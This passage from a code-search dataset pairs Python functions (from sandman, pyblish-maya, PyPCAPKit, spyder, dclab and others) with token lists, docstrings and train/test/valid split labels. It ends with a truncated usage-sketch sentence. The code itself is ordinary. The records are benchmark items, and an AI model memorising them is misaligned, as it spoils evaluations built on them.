[ "def", "run", "(", "generate_pks", ",", "show_pks", ",", "host", ",", "port", ",", "uri", ")", ":", "app", ".", "config", "[", "'SQLALCHEMY_DATABASE_URI'", "]", "=", "uri", "app", ".", "config", "[", "'SANDMAN_GENERATE_PKS'", "]", "=", "generate_pks", "app", ".", "config", "[", "'SANDMAN_SHOW_PKS'", "]", "=", "show_pks", "app", ".", "config", "[", "'SERVER_HOST'", "]", "=", "host", "app", ".", "config", "[", "'SERVER_PORT'", "]", "=", "port", "activate", "(", "name", "=", "'sandmanctl'", ")", "app", ".", "run", "(", "host", "=", "host", ",", "port", "=", "int", "(", "port", ")", ",", "debug", "=", "True", ")" ]
Connect sandman to <URI> and start the API server/admin interface.
[ "Connect", "sandman", "to", "<URI", ">", "and", "start", "the", "API", "server", "/", "admin", "interface", "." ]
python
train
42.6
pyblish/pyblish-maya
pyblish_maya/lib.py
https://github.com/pyblish/pyblish-maya/blob/75db8b5d8de9d53ae95e74195a788b5f6db2cb5f/pyblish_maya/lib.py#L134-L156
def add_to_filemenu(): """Add Pyblish to file-menu .. note:: We're going a bit hacky here, probably due to my lack of understanding for `evalDeferred` or `executeDeferred`, so if you can think of a better solution, feel free to edit. """ if hasattr(cmds, 'about') and not cmds.about(batch=True): # As Maya builds its menus dynamically upon being accessed, # we force its build here prior to adding our entry using it's # native mel function call. mel.eval("evalDeferred buildFileMenu") # Serialise function into string script = inspect.getsource(_add_to_filemenu) script += "\n_add_to_filemenu()" # If cmds doesn't have any members, we're most likely in an # uninitialized batch-mode. It it does exists, ensure we # really aren't in batch mode. cmds.evalDeferred(script)
[ "def", "add_to_filemenu", "(", ")", ":", "if", "hasattr", "(", "cmds", ",", "'about'", ")", "and", "not", "cmds", ".", "about", "(", "batch", "=", "True", ")", ":", "# As Maya builds its menus dynamically upon being accessed,", "# we force its build here prior to adding our entry using it's", "# native mel function call.", "mel", ".", "eval", "(", "\"evalDeferred buildFileMenu\"", ")", "# Serialise function into string", "script", "=", "inspect", ".", "getsource", "(", "_add_to_filemenu", ")", "script", "+=", "\"\\n_add_to_filemenu()\"", "# If cmds doesn't have any members, we're most likely in an", "# uninitialized batch-mode. It it does exists, ensure we", "# really aren't in batch mode.", "cmds", ".", "evalDeferred", "(", "script", ")" ]
Add Pyblish to file-menu .. note:: We're going a bit hacky here, probably due to my lack of understanding for `evalDeferred` or `executeDeferred`, so if you can think of a better solution, feel free to edit.
[ "Add", "Pyblish", "to", "file", "-", "menu" ]
python
test
37.956522
JarryShaw/PyPCAPKit
src/foundation/extraction.py
https://github.com/JarryShaw/PyPCAPKit/blob/c7f0da9aebc2cf210bf8f8b912f7d3cbb98ca10e/src/foundation/extraction.py#L1015-L1082
def _run_server(self, multiprocessing): """Use server multiprocessing to extract PCAP files.""" if not self._flag_m: raise UnsupportedCall(f"Extractor(engine={self._exeng})' has no attribute '_run_server'") if not self._flag_q: self._flag_q = True warnings.warn("'Extractor(engine=pipeline)' does not support output; " f"'fout={self._ofnm}' ignored", AttributeWarning, stacklevel=stacklevel()) self._frnum = 1 # frame number (revised) self._expkg = multiprocessing # multiprocessing module self._mpsvc = NotImplemented # multiprocessing server process self._mpprc = list() # multiprocessing process list self._mpfdp = collections.defaultdict(multiprocessing.Queue) # multiprocessing file pointer self._mpmng = multiprocessing.Manager() # multiprocessing manager self._mpbuf = self._mpmng.dict() # multiprocessing frame dict self._mpfrm = self._mpmng.list() # multiprocessing frame storage self._mprsm = self._mpmng.list() # multiprocessing reassembly buffer self._mpkit = self._mpmng.Namespace() # multiprocessing work kit self._mpkit.counter = 0 # work count (on duty) self._mpkit.pool = 1 # work pool (ready) self._mpkit.eof = False # EOF flag self._mpkit.trace = None # flow tracer # preparation self.record_header() self._mpfdp[0].put(self._gbhdr.length) self._mpsvc = multiprocessing.Process( target=self._server_analyse_frame, kwargs={'mpfrm': self._mpfrm, 'mprsm': self._mprsm, 'mpbuf': self._mpbuf, 'mpkit': self._mpkit} ) self._mpsvc.start() # extraction while True: # check EOF if self._mpkit.eof: self._update_eof() break # check counter if self._mpkit.pool and self._mpkit.counter < CPU_CNT - 1: # update file offset self._ifile.seek(self._mpfdp.pop(self._frnum-1).get(), os.SEEK_SET) # create worker # print(self._frnum, 'start') proc = multiprocessing.Process( target=self._server_extract_frame, kwargs={'mpkit': self._mpkit, 'mpbuf': self._mpbuf, 'mpfdp': self._mpfdp[self._frnum]} ) # update status self._mpkit.pool -= 1 self._mpkit.counter += 1 # start and record proc.start() self._frnum += 1 self._mpprc.append(proc) # check buffer if len(self._mpprc) >= CPU_CNT - 1: [proc.join() for proc in self._mpprc[:-4]] del self._mpprc[:-4]
[ "def", "_run_server", "(", "self", ",", "multiprocessing", ")", ":", "if", "not", "self", ".", "_flag_m", ":", "raise", "UnsupportedCall", "(", "f\"Extractor(engine={self._exeng})' has no attribute '_run_server'\"", ")", "if", "not", "self", ".", "_flag_q", ":", "self", ".", "_flag_q", "=", "True", "warnings", ".", "warn", "(", "\"'Extractor(engine=pipeline)' does not support output; \"", "f\"'fout={self._ofnm}' ignored\"", ",", "AttributeWarning", ",", "stacklevel", "=", "stacklevel", "(", ")", ")", "self", ".", "_frnum", "=", "1", "# frame number (revised)", "self", ".", "_expkg", "=", "multiprocessing", "# multiprocessing module", "self", ".", "_mpsvc", "=", "NotImplemented", "# multiprocessing server process", "self", ".", "_mpprc", "=", "list", "(", ")", "# multiprocessing process list", "self", ".", "_mpfdp", "=", "collections", ".", "defaultdict", "(", "multiprocessing", ".", "Queue", ")", "# multiprocessing file pointer", "self", ".", "_mpmng", "=", "multiprocessing", ".", "Manager", "(", ")", "# multiprocessing manager", "self", ".", "_mpbuf", "=", "self", ".", "_mpmng", ".", "dict", "(", ")", "# multiprocessing frame dict", "self", ".", "_mpfrm", "=", "self", ".", "_mpmng", ".", "list", "(", ")", "# multiprocessing frame storage", "self", ".", "_mprsm", "=", "self", ".", "_mpmng", ".", "list", "(", ")", "# multiprocessing reassembly buffer", "self", ".", "_mpkit", "=", "self", ".", "_mpmng", ".", "Namespace", "(", ")", "# multiprocessing work kit", "self", ".", "_mpkit", ".", "counter", "=", "0", "# work count (on duty)", "self", ".", "_mpkit", ".", "pool", "=", "1", "# work pool (ready)", "self", ".", "_mpkit", ".", "eof", "=", "False", "# EOF flag", "self", ".", "_mpkit", ".", "trace", "=", "None", "# flow tracer", "# preparation", "self", ".", "record_header", "(", ")", "self", ".", "_mpfdp", "[", "0", "]", ".", "put", "(", "self", ".", "_gbhdr", ".", "length", ")", "self", ".", "_mpsvc", "=", "multiprocessing", ".", "Process", "(", "target", "=", "self", ".", "_server_analyse_frame", ",", "kwargs", "=", "{", "'mpfrm'", ":", "self", ".", "_mpfrm", ",", "'mprsm'", ":", "self", ".", "_mprsm", ",", "'mpbuf'", ":", "self", ".", "_mpbuf", ",", "'mpkit'", ":", "self", ".", "_mpkit", "}", ")", "self", ".", "_mpsvc", ".", "start", "(", ")", "# extraction", "while", "True", ":", "# check EOF", "if", "self", ".", "_mpkit", ".", "eof", ":", "self", ".", "_update_eof", "(", ")", "break", "# check counter", "if", "self", ".", "_mpkit", ".", "pool", "and", "self", ".", "_mpkit", ".", "counter", "<", "CPU_CNT", "-", "1", ":", "# update file offset", "self", ".", "_ifile", ".", "seek", "(", "self", ".", "_mpfdp", ".", "pop", "(", "self", ".", "_frnum", "-", "1", ")", ".", "get", "(", ")", ",", "os", ".", "SEEK_SET", ")", "# create worker", "# print(self._frnum, 'start')", "proc", "=", "multiprocessing", ".", "Process", "(", "target", "=", "self", ".", "_server_extract_frame", ",", "kwargs", "=", "{", "'mpkit'", ":", "self", ".", "_mpkit", ",", "'mpbuf'", ":", "self", ".", "_mpbuf", ",", "'mpfdp'", ":", "self", ".", "_mpfdp", "[", "self", ".", "_frnum", "]", "}", ")", "# update status", "self", ".", "_mpkit", ".", "pool", "-=", "1", "self", ".", "_mpkit", ".", "counter", "+=", "1", "# start and record", "proc", ".", "start", "(", ")", "self", ".", "_frnum", "+=", "1", "self", ".", "_mpprc", ".", "append", "(", "proc", ")", "# check buffer", "if", "len", "(", "self", ".", "_mpprc", ")", ">=", "CPU_CNT", "-", "1", ":", "[", "proc", ".", "join", "(", ")", "for", "proc", "in", "self", ".", 
"_mpprc", "[", ":", "-", "4", "]", "]", "del", "self", ".", "_mpprc", "[", ":", "-", "4", "]" ]
Use server multiprocessing to extract PCAP files.
[ "Use", "server", "multiprocessing", "to", "extract", "PCAP", "files", "." ]
python
train
47.647059
algolia/algoliasearch-django
algoliasearch_django/models.py
https://github.com/algolia/algoliasearch-django/blob/ca219db41eb56bdd1c0389cdc1508a41698958d7/algoliasearch_django/models.py#L251-L282
def _should_really_index(self, instance): """Return True if according to should_index the object should be indexed.""" if self._should_index_is_method: is_method = inspect.ismethod(self.should_index) try: count_args = len(inspect.signature(self.should_index).parameters) except AttributeError: # noinspection PyDeprecation count_args = len(inspect.getargspec(self.should_index).args) if is_method or count_args is 1: # bound method, call with instance return self.should_index(instance) else: # unbound method, simply call without arguments return self.should_index() else: # property/attribute/Field, evaluate as bool attr_type = type(self.should_index) if attr_type is DeferredAttribute: attr_value = self.should_index.__get__(instance, None) elif attr_type is str: attr_value = getattr(instance, self.should_index) elif attr_type is property: attr_value = self.should_index.__get__(instance) else: raise AlgoliaIndexError('{} should be a boolean attribute or a method that returns a boolean.'.format( self.should_index)) if type(attr_value) is not bool: raise AlgoliaIndexError("%s's should_index (%s) should be a boolean" % ( instance.__class__.__name__, self.should_index)) return attr_value
[ "def", "_should_really_index", "(", "self", ",", "instance", ")", ":", "if", "self", ".", "_should_index_is_method", ":", "is_method", "=", "inspect", ".", "ismethod", "(", "self", ".", "should_index", ")", "try", ":", "count_args", "=", "len", "(", "inspect", ".", "signature", "(", "self", ".", "should_index", ")", ".", "parameters", ")", "except", "AttributeError", ":", "# noinspection PyDeprecation", "count_args", "=", "len", "(", "inspect", ".", "getargspec", "(", "self", ".", "should_index", ")", ".", "args", ")", "if", "is_method", "or", "count_args", "is", "1", ":", "# bound method, call with instance", "return", "self", ".", "should_index", "(", "instance", ")", "else", ":", "# unbound method, simply call without arguments", "return", "self", ".", "should_index", "(", ")", "else", ":", "# property/attribute/Field, evaluate as bool", "attr_type", "=", "type", "(", "self", ".", "should_index", ")", "if", "attr_type", "is", "DeferredAttribute", ":", "attr_value", "=", "self", ".", "should_index", ".", "__get__", "(", "instance", ",", "None", ")", "elif", "attr_type", "is", "str", ":", "attr_value", "=", "getattr", "(", "instance", ",", "self", ".", "should_index", ")", "elif", "attr_type", "is", "property", ":", "attr_value", "=", "self", ".", "should_index", ".", "__get__", "(", "instance", ")", "else", ":", "raise", "AlgoliaIndexError", "(", "'{} should be a boolean attribute or a method that returns a boolean.'", ".", "format", "(", "self", ".", "should_index", ")", ")", "if", "type", "(", "attr_value", ")", "is", "not", "bool", ":", "raise", "AlgoliaIndexError", "(", "\"%s's should_index (%s) should be a boolean\"", "%", "(", "instance", ".", "__class__", ".", "__name__", ",", "self", ".", "should_index", ")", ")", "return", "attr_value" ]
Return True if according to should_index the object should be indexed.
[ "Return", "True", "if", "according", "to", "should_index", "the", "object", "should", "be", "indexed", "." ]
python
valid
49.3125
gopalkoduri/intonation
intonation/pitch.py
https://github.com/gopalkoduri/intonation/blob/7f50d2b572755840be960ea990416a7b27f20312/intonation/pitch.py#L79-L180
def fit_lines(self, window=1500, break_thresh=1500): """ Fits lines to pitch contours. :param window: size of each chunk to which linear equation is to be fit (in milliseconds). To keep it simple, hop is chosen to be one third of the window. :param break_thresh: If there is silence beyond this limit (in milliseconds), the contour will be broken there into two so that we don't fit a line over and including the silent region. """ window /= 1000 hop = window/3 break_thresh /= 1000 #cut the whole song into pieces if there are gaps more than break_thresh seconds i = 0 break_indices = [] count = 0 while i < len(self.pitch): if self.pitch[i] == -10000: count = 1 start_index = i while i < len(self.pitch) and self.pitch[i] == -10000: count += 1 i += 1 end_index = i-1 if self.timestamps[end_index]-self.timestamps[start_index] >= break_thresh: break_indices.append([start_index, end_index]) i += 1 break_indices = np.array(break_indices) #In creating the data blocks which are not silences, note that we # take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...] # is break_indices, we take e1-s2, e2-s3 chunks and build data blocks data_blocks = [] if len(break_indices) == 0: t_pitch = self.pitch.reshape(len(self.pitch), 1) t_timestamps = self.timestamps.reshape(len(self.timestamps), 1) data_blocks = [np.append(t_timestamps, t_pitch, axis=1)] else: if break_indices[0, 0] != 0: t_pitch = self.pitch[:break_indices[0, 0]] t_pitch = t_pitch.reshape(len(t_pitch), 1) t_timestamps = self.timestamps[:break_indices[0, 0]] t_timestamps = t_timestamps.reshape(len(t_timestamps), 1) data_blocks.append(np.append(t_timestamps, t_pitch, axis=1)) block_start = break_indices[0, 1] for i in xrange(1, len(break_indices)): block_end = break_indices[i, 0] t_pitch = self.pitch[block_start:block_end] t_pitch = t_pitch.reshape(len(t_pitch), 1) t_timestamps = self.timestamps[block_start:block_end] t_timestamps = t_timestamps.reshape(len(t_timestamps), 1) data_blocks.append(np.append(t_timestamps, t_pitch, axis=1)) block_start = break_indices[i, 1] if block_start != len(self.pitch)-1: t_pitch = self.pitch[block_start:] t_pitch = t_pitch.reshape(len(t_pitch), 1) t_timestamps = self.timestamps[block_start:] t_timestamps = t_timestamps.reshape(len(t_timestamps), 1) data_blocks.append(np.append(t_timestamps, t_pitch, axis=1)) label_start_offset = (window-hop)/2 label_end_offset = label_start_offset+hop #dataNew = np.zeros_like(data) #dataNew[:, 0] = data[:, 0] data_new = np.array([[0, 0]]) for data in data_blocks: start_index = 0 while start_index < len(data)-1: end_index = utils.find_nearest_index(data[:, 0], data[start_index][0]+window) segment = data[start_index:end_index] if len(segment) == 0: start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop) continue segment_clean = np.delete(segment, np.where(segment[:, 1] == -10000), axis=0) if len(segment_clean) == 0: #After splitting into blocks, this loop better not come into play #raise ValueError("This part of the block is absolute silence! 
Make sure block_thresh >= window!") start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop) continue n_clean = len(segment_clean) x_clean = np.matrix(segment_clean[:, 0]).reshape(n_clean, 1) y_clean = np.matrix(segment_clean[:, 1]).reshape(n_clean, 1) #return [x_clean, y_clean] theta = utils.normal_equation(x_clean, y_clean) #determine the start and end of the segment to be labelled label_start_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_start_offset) label_end_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_end_offset) x_clean = x_clean[label_start_index:label_end_index] #return x_clean x_clean = np.insert(x_clean, 0, np.ones(len(x_clean)), axis=1) newy = x_clean*theta result = np.append(x_clean[:, 1], newy, axis=1) data_new = np.append(data_new, result, axis=0) start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop) return [data_new[:, 0], data_new[:, 1]]
[ "def", "fit_lines", "(", "self", ",", "window", "=", "1500", ",", "break_thresh", "=", "1500", ")", ":", "window", "/=", "1000", "hop", "=", "window", "/", "3", "break_thresh", "/=", "1000", "#cut the whole song into pieces if there are gaps more than break_thresh seconds", "i", "=", "0", "break_indices", "=", "[", "]", "count", "=", "0", "while", "i", "<", "len", "(", "self", ".", "pitch", ")", ":", "if", "self", ".", "pitch", "[", "i", "]", "==", "-", "10000", ":", "count", "=", "1", "start_index", "=", "i", "while", "i", "<", "len", "(", "self", ".", "pitch", ")", "and", "self", ".", "pitch", "[", "i", "]", "==", "-", "10000", ":", "count", "+=", "1", "i", "+=", "1", "end_index", "=", "i", "-", "1", "if", "self", ".", "timestamps", "[", "end_index", "]", "-", "self", ".", "timestamps", "[", "start_index", "]", ">=", "break_thresh", ":", "break_indices", ".", "append", "(", "[", "start_index", ",", "end_index", "]", ")", "i", "+=", "1", "break_indices", "=", "np", ".", "array", "(", "break_indices", ")", "#In creating the data blocks which are not silences, note that we", "# take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...]", "# is break_indices, we take e1-s2, e2-s3 chunks and build data blocks", "data_blocks", "=", "[", "]", "if", "len", "(", "break_indices", ")", "==", "0", ":", "t_pitch", "=", "self", ".", "pitch", ".", "reshape", "(", "len", "(", "self", ".", "pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", ".", "reshape", "(", "len", "(", "self", ".", "timestamps", ")", ",", "1", ")", "data_blocks", "=", "[", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", "]", "else", ":", "if", "break_indices", "[", "0", ",", "0", "]", "!=", "0", ":", "t_pitch", "=", "self", ".", "pitch", "[", ":", "break_indices", "[", "0", ",", "0", "]", "]", "t_pitch", "=", "t_pitch", ".", "reshape", "(", "len", "(", "t_pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", "[", ":", "break_indices", "[", "0", ",", "0", "]", "]", "t_timestamps", "=", "t_timestamps", ".", "reshape", "(", "len", "(", "t_timestamps", ")", ",", "1", ")", "data_blocks", ".", "append", "(", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", ")", "block_start", "=", "break_indices", "[", "0", ",", "1", "]", "for", "i", "in", "xrange", "(", "1", ",", "len", "(", "break_indices", ")", ")", ":", "block_end", "=", "break_indices", "[", "i", ",", "0", "]", "t_pitch", "=", "self", ".", "pitch", "[", "block_start", ":", "block_end", "]", "t_pitch", "=", "t_pitch", ".", "reshape", "(", "len", "(", "t_pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", "[", "block_start", ":", "block_end", "]", "t_timestamps", "=", "t_timestamps", ".", "reshape", "(", "len", "(", "t_timestamps", ")", ",", "1", ")", "data_blocks", ".", "append", "(", "np", ".", "append", "(", "t_timestamps", ",", "t_pitch", ",", "axis", "=", "1", ")", ")", "block_start", "=", "break_indices", "[", "i", ",", "1", "]", "if", "block_start", "!=", "len", "(", "self", ".", "pitch", ")", "-", "1", ":", "t_pitch", "=", "self", ".", "pitch", "[", "block_start", ":", "]", "t_pitch", "=", "t_pitch", ".", "reshape", "(", "len", "(", "t_pitch", ")", ",", "1", ")", "t_timestamps", "=", "self", ".", "timestamps", "[", "block_start", ":", "]", "t_timestamps", "=", "t_timestamps", ".", "reshape", "(", "len", "(", "t_timestamps", ")", ",", "1", ")", "data_blocks", ".", "append", "(", "np", ".", "append", "(", "t_timestamps", ",", 
"t_pitch", ",", "axis", "=", "1", ")", ")", "label_start_offset", "=", "(", "window", "-", "hop", ")", "/", "2", "label_end_offset", "=", "label_start_offset", "+", "hop", "#dataNew = np.zeros_like(data)", "#dataNew[:, 0] = data[:, 0]", "data_new", "=", "np", ".", "array", "(", "[", "[", "0", ",", "0", "]", "]", ")", "for", "data", "in", "data_blocks", ":", "start_index", "=", "0", "while", "start_index", "<", "len", "(", "data", ")", "-", "1", ":", "end_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", "]", "[", "0", "]", "+", "window", ")", "segment", "=", "data", "[", "start_index", ":", "end_index", "]", "if", "len", "(", "segment", ")", "==", "0", ":", "start_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", ",", "0", "]", "+", "hop", ")", "continue", "segment_clean", "=", "np", ".", "delete", "(", "segment", ",", "np", ".", "where", "(", "segment", "[", ":", ",", "1", "]", "==", "-", "10000", ")", ",", "axis", "=", "0", ")", "if", "len", "(", "segment_clean", ")", "==", "0", ":", "#After splitting into blocks, this loop better not come into play", "#raise ValueError(\"This part of the block is absolute silence! Make sure block_thresh >= window!\")", "start_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", ",", "0", "]", "+", "hop", ")", "continue", "n_clean", "=", "len", "(", "segment_clean", ")", "x_clean", "=", "np", ".", "matrix", "(", "segment_clean", "[", ":", ",", "0", "]", ")", ".", "reshape", "(", "n_clean", ",", "1", ")", "y_clean", "=", "np", ".", "matrix", "(", "segment_clean", "[", ":", ",", "1", "]", ")", ".", "reshape", "(", "n_clean", ",", "1", ")", "#return [x_clean, y_clean]", "theta", "=", "utils", ".", "normal_equation", "(", "x_clean", ",", "y_clean", ")", "#determine the start and end of the segment to be labelled", "label_start_index", "=", "utils", ".", "find_nearest_index", "(", "x_clean", ",", "data", "[", "start_index", ",", "0", "]", "+", "label_start_offset", ")", "label_end_index", "=", "utils", ".", "find_nearest_index", "(", "x_clean", ",", "data", "[", "start_index", ",", "0", "]", "+", "label_end_offset", ")", "x_clean", "=", "x_clean", "[", "label_start_index", ":", "label_end_index", "]", "#return x_clean", "x_clean", "=", "np", ".", "insert", "(", "x_clean", ",", "0", ",", "np", ".", "ones", "(", "len", "(", "x_clean", ")", ")", ",", "axis", "=", "1", ")", "newy", "=", "x_clean", "*", "theta", "result", "=", "np", ".", "append", "(", "x_clean", "[", ":", ",", "1", "]", ",", "newy", ",", "axis", "=", "1", ")", "data_new", "=", "np", ".", "append", "(", "data_new", ",", "result", ",", "axis", "=", "0", ")", "start_index", "=", "utils", ".", "find_nearest_index", "(", "data", "[", ":", ",", "0", "]", ",", "data", "[", "start_index", ",", "0", "]", "+", "hop", ")", "return", "[", "data_new", "[", ":", ",", "0", "]", ",", "data_new", "[", ":", ",", "1", "]", "]" ]
Fits lines to pitch contours. :param window: size of each chunk to which linear equation is to be fit (in milliseconds). To keep it simple, hop is chosen to be one third of the window. :param break_thresh: If there is silence beyond this limit (in milliseconds), the contour will be broken there into two so that we don't fit a line over and including the silent region.
[ "Fits", "lines", "to", "pitch", "contours", "." ]
python
train
50.205882
spyder-ide/spyder
spyder/preferences/shortcuts.py
https://github.com/spyder-ide/spyder/blob/f76836ce1b924bcc4efd3f74f2960d26a4e528e0/spyder/preferences/shortcuts.py#L590-L607
def headerData(self, section, orientation, role=Qt.DisplayRole): """Qt Override.""" if role == Qt.TextAlignmentRole: if orientation == Qt.Horizontal: return to_qvariant(int(Qt.AlignHCenter | Qt.AlignVCenter)) return to_qvariant(int(Qt.AlignRight | Qt.AlignVCenter)) if role != Qt.DisplayRole: return to_qvariant() if orientation == Qt.Horizontal: if section == CONTEXT: return to_qvariant(_("Context")) elif section == NAME: return to_qvariant(_("Name")) elif section == SEQUENCE: return to_qvariant(_("Shortcut")) elif section == SEARCH_SCORE: return to_qvariant(_("Score")) return to_qvariant()
[ "def", "headerData", "(", "self", ",", "section", ",", "orientation", ",", "role", "=", "Qt", ".", "DisplayRole", ")", ":", "if", "role", "==", "Qt", ".", "TextAlignmentRole", ":", "if", "orientation", "==", "Qt", ".", "Horizontal", ":", "return", "to_qvariant", "(", "int", "(", "Qt", ".", "AlignHCenter", "|", "Qt", ".", "AlignVCenter", ")", ")", "return", "to_qvariant", "(", "int", "(", "Qt", ".", "AlignRight", "|", "Qt", ".", "AlignVCenter", ")", ")", "if", "role", "!=", "Qt", ".", "DisplayRole", ":", "return", "to_qvariant", "(", ")", "if", "orientation", "==", "Qt", ".", "Horizontal", ":", "if", "section", "==", "CONTEXT", ":", "return", "to_qvariant", "(", "_", "(", "\"Context\"", ")", ")", "elif", "section", "==", "NAME", ":", "return", "to_qvariant", "(", "_", "(", "\"Name\"", ")", ")", "elif", "section", "==", "SEQUENCE", ":", "return", "to_qvariant", "(", "_", "(", "\"Shortcut\"", ")", ")", "elif", "section", "==", "SEARCH_SCORE", ":", "return", "to_qvariant", "(", "_", "(", "\"Score\"", ")", ")", "return", "to_qvariant", "(", ")" ]
Qt Override.
[ "Qt", "Override", "." ]
python
train
44.444444
ZELLMECHANIK-DRESDEN/dclab
dclab/downsampling.py
https://github.com/ZELLMECHANIK-DRESDEN/dclab/blob/79002c4356e7020c2ba73ab0a3819c9abd4affec/dclab/downsampling.py#L72-L167
def downsample_grid(a, b, samples, ret_idx=False): """Content-based downsampling for faster visualization The arrays `a` and `b` make up a 2D scatter plot with high and low density values. This method takes out points at indices with high density. Parameters ---------- a, b: 1d ndarrays The input arrays to downsample samples: int The desired number of samples remove_invalid: bool Remove nan and inf values before downsampling ret_idx: bool Also return a boolean array that corresponds to the downsampled indices in `a` and `b`. Returns ------- dsa, dsb: 1d ndarrays of shape (samples,) The arrays `a` and `b` downsampled by evenly selecting points and pseudo-randomly adding or removing points to match `samples`. idx: 1d boolean array with same shape as `a` Only returned if `ret_idx` is True. A boolean array such that `a[idx] == dsa` """ # fixed random state for this method rs = np.random.RandomState(seed=47).get_state() samples = int(samples) if samples and samples < a.size: # The events to keep keep = np.zeros_like(a, dtype=bool) # 1. Produce evenly distributed samples # Choosing grid-size: # - large numbers tend to show actual structures of the sample, # which is not desired for plotting # - small numbers tend will not result in too few samples and, # in order to reach the desired samples, the data must be # upsampled again. # 300 is about the size of the plot in marker sizes and yields # good results. grid_size = 300 xpx = norm(a, a, b) * grid_size ypx = norm(b, b, a) * grid_size # The events on the grid to process toproc = np.ones((grid_size, grid_size), dtype=bool) for ii in range(xpx.size): xi = xpx[ii] yi = ypx[ii] # filter for overlapping events if valid(xi, yi) and toproc[int(xi-1), int(yi-1)]: toproc[int(xi-1), int(yi-1)] = False # include event keep[ii] = True # 2. Make sure that we reach `samples` by adding or # removing events. diff = np.sum(keep) - samples if diff > 0: # Too many samples rem_indices = np.where(keep)[0] np.random.set_state(rs) rem = np.random.choice(rem_indices, size=diff, replace=False) keep[rem] = False elif diff < 0: # Not enough samples add_indices = np.where(~keep)[0] np.random.set_state(rs) add = np.random.choice(add_indices, size=abs(diff), replace=False) keep[add] = True assert np.sum(keep) == samples, "sanity check" asd = a[keep] bsd = b[keep] assert np.allclose(a[keep], asd, equal_nan=True), "sanity check" assert np.allclose(b[keep], bsd, equal_nan=True), "sanity check" else: keep = np.ones_like(a, dtype=bool) asd = a bsd = b if ret_idx: return asd, bsd, keep else: return asd, bsd
[ "def", "downsample_grid", "(", "a", ",", "b", ",", "samples", ",", "ret_idx", "=", "False", ")", ":", "# fixed random state for this method", "rs", "=", "np", ".", "random", ".", "RandomState", "(", "seed", "=", "47", ")", ".", "get_state", "(", ")", "samples", "=", "int", "(", "samples", ")", "if", "samples", "and", "samples", "<", "a", ".", "size", ":", "# The events to keep", "keep", "=", "np", ".", "zeros_like", "(", "a", ",", "dtype", "=", "bool", ")", "# 1. Produce evenly distributed samples", "# Choosing grid-size:", "# - large numbers tend to show actual structures of the sample,", "# which is not desired for plotting", "# - small numbers tend will not result in too few samples and,", "# in order to reach the desired samples, the data must be", "# upsampled again.", "# 300 is about the size of the plot in marker sizes and yields", "# good results.", "grid_size", "=", "300", "xpx", "=", "norm", "(", "a", ",", "a", ",", "b", ")", "*", "grid_size", "ypx", "=", "norm", "(", "b", ",", "b", ",", "a", ")", "*", "grid_size", "# The events on the grid to process", "toproc", "=", "np", ".", "ones", "(", "(", "grid_size", ",", "grid_size", ")", ",", "dtype", "=", "bool", ")", "for", "ii", "in", "range", "(", "xpx", ".", "size", ")", ":", "xi", "=", "xpx", "[", "ii", "]", "yi", "=", "ypx", "[", "ii", "]", "# filter for overlapping events", "if", "valid", "(", "xi", ",", "yi", ")", "and", "toproc", "[", "int", "(", "xi", "-", "1", ")", ",", "int", "(", "yi", "-", "1", ")", "]", ":", "toproc", "[", "int", "(", "xi", "-", "1", ")", ",", "int", "(", "yi", "-", "1", ")", "]", "=", "False", "# include event", "keep", "[", "ii", "]", "=", "True", "# 2. Make sure that we reach `samples` by adding or", "# removing events.", "diff", "=", "np", ".", "sum", "(", "keep", ")", "-", "samples", "if", "diff", ">", "0", ":", "# Too many samples", "rem_indices", "=", "np", ".", "where", "(", "keep", ")", "[", "0", "]", "np", ".", "random", ".", "set_state", "(", "rs", ")", "rem", "=", "np", ".", "random", ".", "choice", "(", "rem_indices", ",", "size", "=", "diff", ",", "replace", "=", "False", ")", "keep", "[", "rem", "]", "=", "False", "elif", "diff", "<", "0", ":", "# Not enough samples", "add_indices", "=", "np", ".", "where", "(", "~", "keep", ")", "[", "0", "]", "np", ".", "random", ".", "set_state", "(", "rs", ")", "add", "=", "np", ".", "random", ".", "choice", "(", "add_indices", ",", "size", "=", "abs", "(", "diff", ")", ",", "replace", "=", "False", ")", "keep", "[", "add", "]", "=", "True", "assert", "np", ".", "sum", "(", "keep", ")", "==", "samples", ",", "\"sanity check\"", "asd", "=", "a", "[", "keep", "]", "bsd", "=", "b", "[", "keep", "]", "assert", "np", ".", "allclose", "(", "a", "[", "keep", "]", ",", "asd", ",", "equal_nan", "=", "True", ")", ",", "\"sanity check\"", "assert", "np", ".", "allclose", "(", "b", "[", "keep", "]", ",", "bsd", ",", "equal_nan", "=", "True", ")", ",", "\"sanity check\"", "else", ":", "keep", "=", "np", ".", "ones_like", "(", "a", ",", "dtype", "=", "bool", ")", "asd", "=", "a", "bsd", "=", "b", "if", "ret_idx", ":", "return", "asd", ",", "bsd", ",", "keep", "else", ":", "return", "asd", ",", "bsd" ]
Content-based downsampling for faster visualization The arrays `a` and `b` make up a 2D scatter plot with high and low density values. This method takes out points at indices with high density. Parameters ---------- a, b: 1d ndarrays The input arrays to downsample samples: int The desired number of samples remove_invalid: bool Remove nan and inf values before downsampling ret_idx: bool Also return a boolean array that corresponds to the downsampled indices in `a` and `b`. Returns ------- dsa, dsb: 1d ndarrays of shape (samples,) The arrays `a` and `b` downsampled by evenly selecting points and pseudo-randomly adding or removing points to match `samples`. idx: 1d boolean array with same shape as `a` Only returned if `ret_idx` is True. A boolean array such that `a[idx] == dsa`
[ "Content", "-", "based", "downsampling", "for", "faster", "visualization" ]
python
train
33.96875
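The record above documents dclab's grid-based downsampler. A minimal usage sketch, assuming the import path mirrors the file path in the record (dclab/downsampling.py) and using synthetic scatter data:

import numpy as np
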